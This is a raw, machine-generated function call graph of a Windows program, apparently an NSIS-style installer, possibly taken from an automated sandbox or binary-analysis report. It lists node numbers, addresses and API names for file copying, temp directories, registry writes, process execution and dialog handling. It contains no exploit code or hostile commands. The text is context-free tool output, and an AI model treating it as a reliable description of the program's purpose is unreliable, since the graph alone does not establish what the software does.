403219 11 API calls 3331->3334 3332 4057c5 CharNextA 3332->3333 3333->3326 3333->3332 3337 4033d1 3333->3337 3336 40341a 3334->3336 3336->3330 3339 40341e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3336->3339 3487 405ced lstrcpynA 3337->3487 3341 403219 11 API calls 3339->3341 3344 40344c 3341->3344 3342 403468 3346 4057c5 CharNextA 3342->3346 3350 4034fe 3342->3350 3375 4034ee 3342->3375 3344->3330 3344->3350 3347 403483 3346->3347 3354 4034c9 3347->3354 3355 40352d lstrcatA lstrcmpiA 3347->3355 3348 403517 3513 40551e 3348->3513 3349 40360b 3352 40368e ExitProcess 3349->3352 3357 406018 3 API calls 3349->3357 3504 4036a6 3350->3504 3488 405888 3354->3488 3355->3350 3360 403549 CreateDirectoryA SetCurrentDirectoryA 3355->3360 3358 40361a 3357->3358 3361 406018 3 API calls 3358->3361 3363 403560 3360->3363 3364 40356b 3360->3364 3365 403623 3361->3365 3517 405ced lstrcpynA 3363->3517 3518 405ced lstrcpynA 3364->3518 3368 406018 3 API calls 3365->3368 3370 40362c 3368->3370 3372 40367a ExitWindowsEx 3370->3372 3380 40363a GetCurrentProcess 3370->3380 3371 4034e3 3503 405ced lstrcpynA 3371->3503 3372->3352 3376 403687 3372->3376 3374 405d0f 18 API calls 3377 4035aa DeleteFileA 3374->3377 3433 403798 3375->3433 3378 40140b 2 API calls 3376->3378 3379 4035b7 CopyFileA 3377->3379 3386 403579 3377->3386 3378->3352 3379->3386 3383 40364a 3380->3383 3381 4035ff 3384 405ba1 40 API calls 3381->3384 3383->3372 3384->3350 3385 405d0f 18 API calls 3385->3386 3386->3374 3386->3381 3386->3385 3387 4054bd 2 API calls 3386->3387 3388 4035eb CloseHandle 3386->3388 3519 405ba1 3386->3519 3387->3386 3388->3386 3390 406034 LoadLibraryA 3389->3390 3391 40603f GetProcAddress 3389->3391 3390->3391 3392 403292 SHGetFileInfoA 3390->3392 3391->3392 3393 405ced lstrcpynA 3392->3393 3393->3320 3394->3322 3396 405f58 5 API calls 3395->3396 3397 403225 3396->3397 3398 40322f 3397->3398 3524 40579a lstrlenA CharPrevA 3397->3524 3398->3329 3531 40599b GetFileAttributesA CreateFileA 3403->3531 3405 402cc6 3432 402cd3 3405->3432 3532 405ced lstrcpynA 3405->3532 3407 402ce9 3533 4057e1 lstrlenA 3407->3533 3411 402cfa GetFileSize 3412 402dfb 3411->3412 3431 402d11 3411->3431 3413 402be4 33 API calls 3412->3413 3415 402e02 3413->3415 3414 4031d0 ReadFile 3414->3431 3416 402e3e GlobalAlloc 3415->3416 3415->3432 3538 403202 SetFilePointer 3415->3538 3419 402e55 3416->3419 3417 402e96 3420 402be4 33 API calls 3417->3420 3424 4059ca 2 API calls 3419->3424 3420->3432 3421 402e1f 3422 4031d0 ReadFile 3421->3422 3425 402e2a 3422->3425 3423 402be4 33 API calls 3423->3431 3426 402e66 CreateFileA 3424->3426 3425->3416 3425->3432 3427 402ea0 3426->3427 3426->3432 3539 403202 SetFilePointer 3427->3539 3429 402eae 3430 402f29 48 API calls 3429->3430 3430->3432 3431->3412 3431->3414 3431->3417 3431->3423 3431->3432 3432->3342 3434 406018 3 API calls 3433->3434 3435 4037ac 3434->3435 3436 4037b2 GetUserDefaultUILanguage 3435->3436 3437 4037c4 3435->3437 3540 405c4b wsprintfA 3436->3540 3439 405bd4 3 API calls 3437->3439 3441 4037ef 3439->3441 3440 4037c2 3541 403a5d 3440->3541 3442 40380d lstrcatA 3441->3442 3443 405bd4 3 API calls 3441->3443 3442->3440 3443->3442 3446 405888 18 API calls 3447 40383f 3446->3447 3448 4038c8 3447->3448 3450 405bd4 3 API calls 3447->3450 3449 405888 18 API calls 3448->3449 3451 4038ce 3449->3451 3452 40386b 3450->3452 3453 4038de LoadImageA 3451->3453 3454 405d0f 18 API calls 3451->3454 3452->3448 3457 403887 lstrlenA 3452->3457 3461 4057c5 CharNextA 3452->3461 3455 403984 3453->3455 3456 403905 RegisterClassA 3453->3456 3454->3453 3460 40140b 2 API calls 3455->3460 3458 40398e 3456->3458 3459 40393b SystemParametersInfoA CreateWindowExA 3456->3459 3462 403895 lstrcmpiA 3457->3462 3463 4038bb 3457->3463 3458->3350 3459->3455 3464 40398a 3460->3464 3466 403885 3461->3466 3462->3463 3467 4038a5 GetFileAttributesA 3462->3467 3465 40579a 3 API calls 3463->3465 3464->3458 3468 403a5d 19 API calls 3464->3468 3469 4038c1 3465->3469 3466->3457 3470 4038b1 3467->3470 3472 40399b 3468->3472 3550 405ced lstrcpynA 3469->3550 3470->3463 3471 4057e1 2 API calls 3470->3471 3471->3463 3474 4039a7 ShowWindow LoadLibraryA 3472->3474 3475 403a2a 3472->3475 3476 4039c6 LoadLibraryA 3474->3476 3477 4039cd GetClassInfoA 3474->3477 3551 4050cc OleInitialize 3475->3551 3476->3477 3479 4039e1 GetClassInfoA RegisterClassA 3477->3479 3480 4039f7 DialogBoxParamA 3477->3480 3479->3480 3484 40140b 2 API calls 3480->3484 3481 403a30 3482 403a34 3481->3482 3483 403a4c 3481->3483 3482->3458 3486 40140b 2 API calls 3482->3486 3485 40140b 2 API calls 3483->3485 3484->3458 3485->3458 3486->3458 3487->3327 3559 405ced lstrcpynA 3488->3559 3490 405899 3491 405833 4 API calls 3490->3491 3492 40589f 3491->3492 3493 4034d4 3492->3493 3494 405f58 5 API calls 3492->3494 3493->3350 3502 405ced lstrcpynA 3493->3502 3500 4058af 3494->3500 3495 4058da lstrlenA 3496 4058e5 3495->3496 3495->3500 3498 40579a 3 API calls 3496->3498 3499 4058ea GetFileAttributesA 3498->3499 3499->3493 3500->3493 3500->3495 3501 4057e1 2 API calls 3500->3501 3560 405ff1 FindFirstFileA 3500->3560 3501->3495 3502->3371 3503->3375 3505 4036c1 3504->3505 3506 4036b7 CloseHandle 3504->3506 3507 4036d5 3505->3507 3508 4036cb CloseHandle 3505->3508 3506->3505 3563 403703 3507->3563 3508->3507 3514 405533 3513->3514 3515 403525 ExitProcess 3514->3515 3516 405547 MessageBoxIndirectA 3514->3516 3516->3515 3517->3364 3518->3386 3520 406018 3 API calls 3519->3520 3521 405ba8 3520->3521 3523 405bc9 3521->3523 3617 405a13 lstrcpyA 3521->3617 3523->3386 3525 4057b4 lstrcatA 3524->3525 3526 403237 CreateDirectoryA 3524->3526 3525->3526 3527 4059ca 3526->3527 3528 4059d5 GetTickCount GetTempFileNameA 3527->3528 3529 405a02 3528->3529 3530 40324b 3528->3530 3529->3528 3529->3530 3530->3329 3531->3405 3532->3407 3534 4057ee 3533->3534 3535 4057f3 CharPrevA 3534->3535 3536 402cef 3534->3536 3535->3534 3535->3536 3537 405ced lstrcpynA 3536->3537 3537->3411 3538->3421 3539->3429 3540->3440 3542 403a71 3541->3542 3558 405c4b wsprintfA 3542->3558 3544 403ae2 3545 405d0f 18 API calls 3544->3545 3546 403aee SetWindowTextA 3545->3546 3547 40381d 3546->3547 3548 403b0a 3546->3548 3547->3446 3548->3547 3549 405d0f 18 API calls 3548->3549 3549->3548 3550->3448 3552 404049 SendMessageA 3551->3552 3553 4050ef 3552->3553 3556 401389 2 API calls 3553->3556 3557 405116 3553->3557 3554 404049 SendMessageA 3555 405128 OleUninitialize 3554->3555 3555->3481 3556->3553 3557->3554 3558->3544 3559->3490 3561 406012 3560->3561 3562 406007 FindClose 3560->3562 3561->3500 3562->3561 3564 403711 3563->3564 3565 4036da 3564->3565 3566 403716 FreeLibrary GlobalFree 3564->3566 3567 4055ca 3565->3567 3566->3565 3566->3566 3568 405888 18 API calls 3567->3568 3569 4055ea 3568->3569 3570 4055f2 DeleteFileA 3569->3570 3571 405609 3569->3571 3600 403507 OleUninitialize 3570->3600 3572 405737 3571->3572 3604 405ced lstrcpynA 3571->3604 3577 405ff1 2 API calls 3572->3577 3572->3600 3574 40562f 3575 405642 3574->3575 3576 405635 lstrcatA 3574->3576 3579 4057e1 2 API calls 3575->3579 3578 405648 3576->3578 3581 40575b 3577->3581 3580 405656 lstrcatA 3578->3580 3582 405661 lstrlenA FindFirstFileA 3578->3582 3579->3578 3580->3582 3583 40579a 3 API calls 3581->3583 3581->3600 3582->3572 3587 405685 3582->3587 3585 405765 3583->3585 3584 4057c5 CharNextA 3584->3587 3586 405582 5 API calls 3585->3586 3588 405771 3586->3588 3587->3584 3592 405716 FindNextFileA 3587->3592 3599 4055ca 64 API calls 3587->3599 3601 404ffa 25 API calls 3587->3601 3602 404ffa 25 API calls 3587->3602 3603 405ba1 40 API calls 3587->3603 3605 405ced lstrcpynA 3587->3605 3606 405582 3587->3606 3589 405775 3588->3589 3590 40578b 3588->3590 3594 404ffa 25 API calls 3589->3594 3589->3600 3591 404ffa 25 API calls 3590->3591 3591->3600 3592->3587 3595 40572e FindClose 3592->3595 3596 405782 3594->3596 3595->3572 3597 405ba1 40 API calls 3596->3597 3597->3600 3599->3587 3600->3348 3600->3349 3601->3592 3602->3587 3603->3587 3604->3574 3605->3587 3614 405976 GetFileAttributesA 3606->3614 3609 4055af 3609->3587 3610 4055a5 DeleteFileA 3612 4055ab 3610->3612 3611 40559d RemoveDirectoryA 3611->3612 3612->3609 3613 4055bb SetFileAttributesA 3612->3613 3613->3609 3615 40558e 3614->3615 3616 405988 SetFileAttributesA 3614->3616 3615->3609 3615->3610 3615->3611 3616->3615 3618 405a62 GetShortPathNameA 3617->3618 3619 405a3c 3617->3619 3621 405a77 3618->3621 3622 405b9b 3618->3622 3641 40599b GetFileAttributesA CreateFileA 3619->3641 3621->3622 3624 405a7f wsprintfA 3621->3624 3622->3523 3623 405a46 CloseHandle GetShortPathNameA 3623->3622 3625 405a5a 3623->3625 3626 405d0f 18 API calls 3624->3626 3625->3618 3625->3622 3627 405aa7 3626->3627 3642 40599b GetFileAttributesA CreateFileA 3627->3642 3629 405ab4 3629->3622 3630 405ac3 GetFileSize GlobalAlloc 3629->3630 3631 405b94 CloseHandle 3630->3631 3632 405ae5 ReadFile 3630->3632 3631->3622 3632->3631 3633 405afd 3632->3633 3633->3631 3643 405900 lstrlenA 3633->3643 3636 405b16 lstrcpyA 3638 405b38 3636->3638 3637 405b2a 3639 405900 4 API calls 3637->3639 3640 405b6f SetFilePointer WriteFile GlobalFree 3638->3640 3639->3638 3640->3631 3641->3623 3642->3629 3644 405941 lstrlenA 3643->3644 3645 405949 3644->3645 3646 40591a lstrcmpiA 3644->3646 3645->3636 3645->3637 3646->3645 3647 405938 CharNextA 3646->3647 3647->3644 3791 40264f 3792 402a07 18 API calls 3791->3792 3793 402656 FindFirstFileA 3792->3793 3794 402679 3793->3794 3797 402669 3793->3797 3799 405c4b wsprintfA 3794->3799 3796 402680 3800 405ced lstrcpynA 3796->3800 3799->3796 3800->3797 3801 4024cf 3802 4024d4 3801->3802 3803 4024e5 3801->3803 3805 4029ea 18 API calls 3802->3805 3804 402a07 18 API calls 3803->3804 3806 4024ec lstrlenA 3804->3806 3807 4024db 3805->3807 3806->3807 3808 40250b WriteFile 3807->3808 3809 40266d 3807->3809 3808->3809 3810 401650 3811 402a07 18 API calls 3810->3811 3812 401657 3811->3812 3813 402a07 18 API calls 3812->3813 3814 401660 3813->3814 3815 402a07 18 API calls 3814->3815 3816 401669 MoveFileA 3815->3816 3817 40167c 3816->3817 3823 401675 3816->3823 3819 405ff1 2 API calls 3817->3819 3821 40217f 3817->3821 3818 401423 25 API calls 3818->3821 3820 40168b 3819->3820 3820->3821 3822 405ba1 40 API calls 3820->3822 3822->3823 3823->3818 3831 403756 3832 403761 3831->3832 3833 403765 3832->3833 3834 403768 GlobalAlloc 3832->3834 3834->3833 3835 4014d6 3836 4029ea 18 API calls 3835->3836 3837 4014dc Sleep 3836->3837 3839 40289c 3837->3839 3840 401dd8 3841 402a07 18 API calls 3840->3841 3842 401dde 3841->3842 3843 402a07 18 API calls 3842->3843 3844 401de7 3843->3844 3845 402a07 18 API calls 3844->3845 3846 401df0 3845->3846 3847 402a07 18 API calls 3846->3847 3848 401df9 3847->3848 3849 401423 25 API calls 3848->3849 3850 401e00 ShellExecuteA 3849->3850 3851 401e2d 3850->3851 3852 40155b 3853 401577 ShowWindow 3852->3853 3854 40157e 3852->3854 3853->3854 3855 40289c 3854->3855 3856 40158c ShowWindow 3854->3856 3856->3855 3857 401edc 3858 402a07 18 API calls 3857->3858 3859 401ee3 GetFileVersionInfoSizeA 3858->3859 3860 401f06 GlobalAlloc 3859->3860 3861 401f5c 3859->3861 3860->3861 3862 401f1a GetFileVersionInfoA 3860->3862 3862->3861 3863 401f2b VerQueryValueA 3862->3863 3863->3861 3864 401f44 3863->3864 3868 405c4b wsprintfA 3864->3868 3866 401f50 3869 405c4b wsprintfA 3866->3869 3868->3866 3869->3861 3870 4025dd 3871 4025e4 3870->3871 3872 402849 3870->3872 3873 4029ea 18 API calls 3871->3873 3874 4025ef 3873->3874 3875 4025f6 SetFilePointer 3874->3875 3875->3872 3876 402606 3875->3876 3878 405c4b wsprintfA 3876->3878 3878->3872 3884 4018e3 3885 40191a 3884->3885 3886 402a07 18 API calls 3885->3886 3887 40191f 3886->3887 3888 4055ca 71 API calls 3887->3888 3889 401928 3888->3889 3897 4018e6 3898 402a07 18 API calls 3897->3898 3899 4018ed 3898->3899 3900 40551e MessageBoxIndirectA 3899->3900 3901 4018f6 3900->3901 3902 401f68 3903 401f7a 3902->3903 3913 402028 3902->3913 3904 402a07 18 API calls 3903->3904 3905 401f81 3904->3905 3907 402a07 18 API calls 3905->3907 3906 401423 25 API calls 3909 40217f 3906->3909 3908 401f8a 3907->3908 3910 401f92 GetModuleHandleA 3908->3910 3911 401f9f LoadLibraryExA 3908->3911 3910->3911 3912 401faf GetProcAddress 3910->3912 3911->3912 3911->3913 3914 401ffb 3912->3914 3915 401fbe 3912->3915 3913->3906 3916 404ffa 25 API calls 3914->3916 3917 401423 25 API calls 3915->3917 3918 401fce 3915->3918 3916->3918 3917->3918 3918->3909 3919 40201c FreeLibrary 3918->3919 3919->3909 3648 404f6e 3649 404f92 3648->3649 3650 404f7e 3648->3650 3653 404f9a IsWindowVisible 3649->3653 3660 404fba 3649->3660 3651 404f84 3650->3651 3652 404fdb 3650->3652 3655 404049 SendMessageA 3651->3655 3654 404fe0 CallWindowProcA 3652->3654 3653->3652 3656 404fa7 3653->3656 3657 404f8e 3654->3657 3655->3657 3658 4048c5 5 API calls 3656->3658 3659 404fb1 3658->3659 3659->3660 3660->3654 3661 404945 4 API calls 3660->3661 3661->3652 3920 4014f0 SetForegroundWindow 3921 40289c 3920->3921 3922 401af0 3923 402a07 18 API calls 3922->3923 3924 401af7 3923->3924 3925 4029ea 18 API calls 3924->3925 3926 401b00 wsprintfA 3925->3926 3927 40289c 3926->3927 2926 4019f1 2932 402a07 2926->2932 2929 401a0e 2930 401a13 lstrcmpA 2929->2930 2931 401a21 2929->2931 2930->2931 2933 402a13 2932->2933 2938 405d0f 2933->2938 2936 4019fa ExpandEnvironmentStringsA 2936->2929 2936->2931 2939 405d1c 2938->2939 2940 405f3f 2939->2940 2943 405dbd GetVersion 2939->2943 2944 405f16 lstrlenA 2939->2944 2947 405d0f 10 API calls 2939->2947 2948 405e35 GetSystemDirectoryA 2939->2948 2950 405e48 GetWindowsDirectoryA 2939->2950 2951 405f58 5 API calls 2939->2951 2952 405e7c SHGetSpecialFolderLocation 2939->2952 2953 405d0f 10 API calls 2939->2953 2954 405ebf lstrcatA 2939->2954 2965 405bd4 RegOpenKeyExA 2939->2965 2970 405c4b wsprintfA 2939->2970 2971 405ced lstrcpynA 2939->2971 2941 402a34 2940->2941 2972 405ced lstrcpynA 2940->2972 2941->2936 2956 405f58 2941->2956 2943->2939 2944->2939 2947->2944 2948->2939 2950->2939 2951->2939 2952->2939 2955 405e94 SHGetPathFromIDListA CoTaskMemFree 2952->2955 2953->2939 2954->2939 2955->2939 2962 405f64 2956->2962 2957 405fcc 2958 405fd0 CharPrevA 2957->2958 2960 405feb 2957->2960 2958->2957 2959 405fc1 CharNextA 2959->2957 2959->2962 2960->2936 2962->2957 2962->2959 2963 405faf CharNextA 2962->2963 2964 405fbc CharNextA 2962->2964 2973 4057c5 2962->2973 2963->2962 2964->2959 2966 405c45 2965->2966 2967 405c07 RegQueryValueExA 2965->2967 2966->2939 2968 405c28 RegCloseKey 2967->2968 2968->2966 2970->2939 2971->2939 2972->2941 2974 4057cb 2973->2974 2975 4057de 2974->2975 2976 4057d1 CharNextA 2974->2976 2975->2962 2976->2974 3928 4043f4 3929 404404 3928->3929 3930 40442a 3928->3930 3932 403ffd 19 API calls 3929->3932 3931 404064 8 API calls 3930->3931 3933 404436 3931->3933 3934 404411 SetDlgItemTextA 3932->3934 3934->3930 3056 404977 GetDlgItem GetDlgItem 3057 4049c9 7 API calls 3056->3057 3063 404be1 3056->3063 3058 404a6c DeleteObject 3057->3058 3059 404a5f SendMessageA 3057->3059 3060 404a75 3058->3060 3059->3058 3061 404aac 3060->3061 3066 405d0f 18 API calls 3060->3066 3110 403ffd 3061->3110 3062 404cc5 3065 404d71 3062->3065 3070 404f59 3062->3070 3076 404d1e SendMessageA 3062->3076 3063->3062 3067 404ca6 3063->3067 3068 404c41 3063->3068 3071 404d83 3065->3071 3072 404d7b SendMessageA 3065->3072 3073 404a8e SendMessageA SendMessageA 3066->3073 3067->3062 3078 404cb7 SendMessageA 3067->3078 3115 4048c5 SendMessageA 3068->3115 3069 404ac0 3075 403ffd 19 API calls 3069->3075 3137 404064 3070->3137 3079 404d95 ImageList_Destroy 3071->3079 3080 404d9c 3071->3080 3088 404dac 3071->3088 3072->3071 3073->3060 3093 404ace 3075->3093 3076->3070 3082 404d33 SendMessageA 3076->3082 3078->3062 3079->3080 3084 404da5 GlobalFree 3080->3084 3080->3088 3081 404f1b 3081->3070 3089 404f2d ShowWindow GetDlgItem ShowWindow 3081->3089 3086 404d46 3082->3086 3084->3088 3085 404ba2 GetWindowLongA SetWindowLongA 3087 404bbb 3085->3087 3097 404d57 SendMessageA 3086->3097 3090 404bc1 ShowWindow 3087->3090 3091 404bd9 3087->3091 3088->3081 3106 404de7 3088->3106 3120 404945 3088->3120 3089->3070 3113 404032 SendMessageA 3090->3113 3114 404032 SendMessageA 3091->3114 3092 404c52 3092->3067 3093->3085 3096 404b1d SendMessageA 3093->3096 3098 404b9c 3093->3098 3100 404b59 SendMessageA 3093->3100 3101 404b6a SendMessageA 3093->3101 3096->3093 3097->3065 3098->3085 3098->3087 3099 404bd4 3099->3070 3100->3093 3101->3093 3103 404ef1 InvalidateRect 3103->3081 3104 404f07 3103->3104 3129 4047e3 3104->3129 3105 404e15 SendMessageA 3109 404e2b 3105->3109 3106->3105 3106->3109 3108 404e9f SendMessageA SendMessageA 3108->3109 3109->3103 3109->3108 3111 405d0f 18 API calls 3110->3111 3112 404008 SetDlgItemTextA 3111->3112 3112->3069 3113->3099 3114->3063 3116 404924 SendMessageA 3115->3116 3117 4048e8 GetMessagePos ScreenToClient SendMessageA 3115->3117 3119 40491c 3116->3119 3118 404921 3117->3118 3117->3119 3118->3116 3119->3092 3151 405ced lstrcpynA 3120->3151 3122 404958 3152 405c4b wsprintfA 3122->3152 3124 404962 3153 40140b 3124->3153 3128 404972 3128->3106 3130 4047fd 3129->3130 3131 405d0f 18 API calls 3130->3131 3132 404832 3131->3132 3133 405d0f 18 API calls 3132->3133 3134 40483d 3133->3134 3135 405d0f 18 API calls 3134->3135 3136 40486e lstrlenA wsprintfA SetDlgItemTextA 3135->3136 3136->3081 3138 40407c GetWindowLongA 3137->3138 3139 404105 3137->3139 3138->3139 3140 40408d 3138->3140 3141 40409c GetSysColor 3140->3141 3142 40409f 3140->3142 3141->3142 3143 4040a5 SetTextColor 3142->3143 3144 4040af SetBkMode 3142->3144 3143->3144 3145 4040c7 GetSysColor 3144->3145 3146 4040cd 3144->3146 3145->3146 3147 4040d4 SetBkColor 3146->3147 3148 4040de 3146->3148 3147->3148 3148->3139 3149 4040f1 DeleteObject 3148->3149 3150 4040f8 CreateBrushIndirect 3148->3150 3149->3150 3150->3139 3151->3122 3152->3124 3157 401389 3153->3157 3156 405ced lstrcpynA 3156->3128 3159 401390 3157->3159 3158 4013fe 3158->3156 3159->3158 3160 4013cb MulDiv SendMessageA 3159->3160 3160->3159 3935 402877 SendMessageA 3936 402891 InvalidateRect 3935->3936 3937 40289c 3935->3937 3936->3937 3938 401c78 3939 4029ea 18 API calls 3938->3939 3940 401c7e IsWindow 3939->3940 3941 4019e1 3940->3941 3949 40477d 3950 4047a9 3949->3950 3951 40478d 3949->3951 3953 4047dc 3950->3953 3954 4047af SHGetPathFromIDListA 3950->3954 3960 405502 GetDlgItemTextA 3951->3960 3956 4047bf 3954->3956 3959 4047c6 SendMessageA 3954->3959 3955 40479a SendMessageA 3955->3950 3958 40140b 2 API calls 3956->3958 3958->3959 3959->3953 3960->3955 3961 40227d 3962 402a07 18 API calls 3961->3962 3963 40228e 3962->3963 3964 402a07 18 API calls 3963->3964 3965 402297 3964->3965 3966 402a07 18 API calls 3965->3966 3967 4022a1 GetPrivateProfileStringA 3966->3967 3975 4014fe 3976 401506 3975->3976 3978 401519 3975->3978 3977 4029ea 18 API calls 3976->3977 3977->3978 3979 401000 3980 401037 BeginPaint GetClientRect 3979->3980 3981 40100c DefWindowProcA 3979->3981 3983 4010f3 3980->3983 3984 401179 3981->3984 3985 401073 CreateBrushIndirect FillRect DeleteObject 3983->3985 3986 4010fc 3983->3986 3985->3983 3987 401102 CreateFontIndirectA 3986->3987 3988 401167 EndPaint 3986->3988 3987->3988 3989 401112 6 API calls 3987->3989 3988->3984 3989->3988 3997 401705 3998 402a07 18 API calls 3997->3998 3999 40170c SearchPathA 3998->3999 4000 401727 3999->4000 4001 402188 4002 402a07 18 API calls 4001->4002 4003 40218e 4002->4003 4004 402a07 18 API calls 4003->4004 4005 402197 4004->4005 4006 402a07 18 API calls 4005->4006 4007 4021a0 4006->4007 4008 405ff1 2 API calls 4007->4008 4009 4021a9 4008->4009 4010 4021ba lstrlenA lstrlenA 4009->4010 4014 4021ad 4009->4014 4012 404ffa 25 API calls 4010->4012 4011 404ffa 25 API calls 4015 4021b5 4011->4015 4013 4021f6 SHFileOperationA 4012->4013 4013->4014 4013->4015 4014->4011 4014->4015 4016 40220a 4017 402211 4016->4017 4019 402224 4016->4019 4018 405d0f 18 API calls 4017->4018 4020 40221e 4018->4020 4021 40551e MessageBoxIndirectA 4020->4021 4021->4019 4022 40260c 4023 402613 4022->4023 4024 40289c 4022->4024 4025 402619 FindClose 4023->4025 4025->4024 4026 40268d 4027 402a07 18 API calls 4026->4027 4029 40269b 4027->4029 4028 4026b1 4031 405976 2 API calls 4028->4031 4029->4028 4030 402a07 18 API calls 4029->4030 4030->4028 4032 4026b7 4031->4032 4052 40599b GetFileAttributesA CreateFileA 4032->4052 4034 4026c4 4035 4026d0 GlobalAlloc 4034->4035 4036 40276d 4034->4036 4037 402764 CloseHandle 4035->4037 4038 4026e9 4035->4038 4039 402775 DeleteFileA 4036->4039 4040 402788 4036->4040 4037->4036 4053 403202 SetFilePointer 4038->4053 4039->4040 4042 4026ef 4043 4031d0 ReadFile 4042->4043 4044 4026f8 GlobalAlloc 4043->4044 4045 402708 4044->4045 4046 40273c WriteFile GlobalFree 4044->4046 4047 402f29 48 API calls 4045->4047 4048 402f29 48 API calls 4046->4048 4051 402715 4047->4051 4049 402761 4048->4049 4049->4037 4050 402733 GlobalFree 4050->4046 4051->4050 4052->4034 4053->4042 4054 401490 4055 404ffa 25 API calls 4054->4055 4056 401497 4055->4056 4057 404111 lstrcpynA lstrlenA 4058 401b11 4059 401b62 4058->4059 4060 401b1e 4058->4060 4061 401b66 4059->4061 4062 401b8b GlobalAlloc 4059->4062 4063 401ba6 4060->4063 4066 401b35 4060->4066 4071 402224 4061->4071 4079 405ced lstrcpynA 4061->4079 4065 405d0f 18 API calls 4062->4065 4064 405d0f 18 API calls 4063->4064 4063->4071 4068 40221e 4064->4068 4065->4063 4077 405ced lstrcpynA 4066->4077 4073 40551e MessageBoxIndirectA 4068->4073 4070 401b78 GlobalFree 4070->4071 4072 401b44 4078 405ced lstrcpynA 4072->4078 4073->4071 4075 401b53 4080 405ced lstrcpynA 4075->4080 4077->4072 4078->4075 4079->4070 4080->4071 4088 402814 4089 4029ea 18 API calls 4088->4089 4090 40281a 4089->4090 4091 40284b 4090->4091 4092 40266d 4090->4092 4093 402828 4090->4093 4091->4092 4094 405d0f 18 API calls 4091->4094 4093->4092 4096 405c4b wsprintfA 4093->4096 4094->4092 4096->4092 4097 401595 4098 402a07 18 API calls 4097->4098 4099 40159c SetFileAttributesA 4098->4099 4100 4015ae 4099->4100 4101 401c95 4102 4029ea 18 API calls 4101->4102 4103 401c9c 4102->4103 4104 4029ea 18 API calls 4103->4104 4105 401ca4 GetDlgItem 4104->4105 4106 4024c9 4105->4106 4107 402517 4108 4029ea 18 API calls 4107->4108 4109 402521 4108->4109 4110 402555 ReadFile 4109->4110 4111 402599 4109->4111 4113 4025a9 4109->4113 4115 402597 4109->4115 4110->4109 4110->4115 4116 405c4b wsprintfA 4111->4116 4114 4025bf SetFilePointer 4113->4114 4113->4115 4114->4115 4116->4115 3161 40231a 3162 402320 3161->3162 3163 402a07 18 API calls 3162->3163 3164 402332 3163->3164 3165 402a07 18 API calls 3164->3165 3166 40233c RegCreateKeyExA 3165->3166 3167 402366 3166->3167 3168 40289c 3166->3168 3169 40237e 3167->3169 3170 402a07 18 API calls 3167->3170 3171 40238a 3169->3171 3178 4029ea 3169->3178 3172 402377 lstrlenA 3170->3172 3174 4023a5 RegSetValueExA 3171->3174 3181 402f29 3171->3181 3172->3169 3176 4023bb RegCloseKey 3174->3176 3176->3168 3179 405d0f 18 API calls 3178->3179 3180 4029fe 3179->3180 3180->3171 3182 402f56 3181->3182 3183 402f3a SetFilePointer 3181->3183 3196 403054 GetTickCount 3182->3196 3183->3182 3186 402f67 ReadFile 3187 402f87 3186->3187 3188 403013 3186->3188 3187->3188 3189 403054 43 API calls 3187->3189 3188->3174 3190 402f9e 3189->3190 3190->3188 3191 403019 ReadFile 3190->3191 3193 402fae 3190->3193 3191->3188 3193->3188 3194 402fc9 ReadFile 3193->3194 3195 402fe2 WriteFile 3193->3195 3194->3188 3194->3193 3195->3188 3195->3193 3197 403083 3196->3197 3198 4031be 3196->3198 3209 403202 SetFilePointer 3197->3209 3199 402be4 33 API calls 3198->3199 3201 402f5f 3199->3201 3201->3186 3201->3188 3202 40308e SetFilePointer 3203 4030b3 3202->3203 3203->3201 3207 403148 WriteFile 3203->3207 3208 40319f SetFilePointer 3203->3208 3210 4031d0 ReadFile 3203->3210 3212 406118 3203->3212 3219 402be4 3203->3219 3207->3201 3207->3203 3208->3198 3209->3202 3211 4031f1 3210->3211 3211->3203 3213 40613d 3212->3213 3216 406145 3212->3216 3213->3203 3214 4061d5 GlobalAlloc 3214->3213 3214->3216 3215 4061cc GlobalFree 3215->3214 3216->3213 3216->3214 3216->3215 3217 406243 GlobalFree 3216->3217 3218 40624c GlobalAlloc 3216->3218 3217->3218 3218->3213 3218->3216 3220 402bf2 3219->3220 3221 402c0a 3219->3221 3222 402c02 3220->3222 3223 402bfb DestroyWindow 3220->3223 3224 402c12 3221->3224 3225 402c1a GetTickCount 3221->3225 3222->3203 3223->3222 3227 406051 2 API calls 3224->3227 3225->3222 3226 402c28 3225->3226 3228 402c30 3226->3228 3229 402c5d CreateDialogParamA ShowWindow 3226->3229 3227->3222 3228->3222 3234 402bc8 3228->3234 3229->3222 3231 402c3e wsprintfA 3232 404ffa 25 API calls 3231->3232 3233 402c5b 3232->3233 3233->3222 3235 402bd7 3234->3235 3236 402bd9 MulDiv 3234->3236 3235->3236 3236->3231 4123 4016a1 4124 402a07 18 API calls 4123->4124 4125 4016a7 GetFullPathNameA 4124->4125 4126 4016be 4125->4126 4132 4016df 4125->4132 4129 405ff1 2 API calls 4126->4129 4126->4132 4127 4016f3 GetShortPathNameA 4128 40289c 4127->4128 4130 4016cf 4129->4130 4130->4132 4133 405ced lstrcpynA 4130->4133 4132->4127 4132->4128 4133->4132 4134 401d26 GetDC GetDeviceCaps 4135 4029ea 18 API calls 4134->4135 4136 401d44 MulDiv ReleaseDC 4135->4136 4137 4029ea 18 API calls 4136->4137 4138 401d63 4137->4138 4139 405d0f 18 API calls 4138->4139 4140 401d9c CreateFontIndirectA 4139->4140 4141 4024c9 4140->4141 4142 402626 4143 402629 4142->4143 4145 402641 4142->4145 4144 402636 FindNextFileA 4143->4144 4144->4145 4146 402680 4144->4146 4148 405ced lstrcpynA 4146->4148 4148->4145 3237 403b2a 3238 403b42 3237->3238 3239 403c7d 3237->3239 3238->3239 3240 403b4e 3238->3240 3241 403cce 3239->3241 3242 403c8e GetDlgItem GetDlgItem 3239->3242 3244 403b59 SetWindowPos 3240->3244 3245 403b6c 3240->3245 3243 403d28 3241->3243 3251 401389 2 API calls 3241->3251 3246 403ffd 19 API calls 3242->3246 3300 403c78 3243->3300 3307 404049 3243->3307 3244->3245 3248 403b71 ShowWindow 3245->3248 3249 403b89 3245->3249 3250 403cb8 SetClassLongA 3246->3250 3248->3249 3252 403b91 DestroyWindow 3249->3252 3253 403bab 3249->3253 3254 40140b 2 API calls 3250->3254 3257 403d00 3251->3257 3261 403f86 3252->3261 3255 403bb0 SetWindowLongA 3253->3255 3256 403bc1 3253->3256 3254->3241 3255->3300 3258 403c6a 3256->3258 3259 403bcd GetDlgItem 3256->3259 3257->3243 3260 403d04 SendMessageA 3257->3260 3266 404064 8 API calls 3258->3266 3264 403be0 SendMessageA IsWindowEnabled 3259->3264 3265 403bfd 3259->3265 3260->3300 3267 403fb7 ShowWindow 3261->3267 